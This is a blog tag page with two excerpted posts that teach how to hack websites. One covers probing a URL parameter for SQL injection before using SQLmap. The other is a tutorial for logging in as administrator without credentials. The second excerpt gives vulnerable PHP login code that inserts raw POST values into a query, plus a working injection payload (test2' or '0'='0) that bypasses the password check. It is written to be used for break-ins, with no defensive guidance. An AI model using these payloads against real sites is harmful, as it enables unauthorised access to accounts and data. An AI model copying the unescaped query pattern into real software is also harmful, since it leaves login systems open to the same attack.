Posts Tagged ‘hacking’

Hacking Website Database with SQLmap in Backtrack 5 or Linux OS

All we needed is a vulnerability webpage. Lets say you have a url like this

http://www.site.com/section.php?id=51

and that it is prone to sql injection because the developer of that site did not properly escape the parameter id.

This can be simply tested by trying to open the url

http://www.site.com/section.php?id=51'

We just added a single quote in the parameter. If this url throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote..

To understand the process please change video quality to 1080p and watch in HD Quality

Read more »

How to login as Administrator in website without having username and password

 
Method 1
 
If the PHP code in the login check page is like below
 
<?php
 
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='$username' and password='$password' ");
 
?>
 
Then we can easily login to the system without having any username or password. Change the value of username and password so that it bypasses login check.
 
Put the value of username : test1 
Put the value of password  : test2' or '0'='0
 
Then the PHP code in the login check page will be changed to
 
<?php
 
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='test1' and password='test2' or '0'='0' ");
 
?>
 
Then 0=0 will always return a true value. Then database returns the first row from the user table so we can login as the first user.


Read more »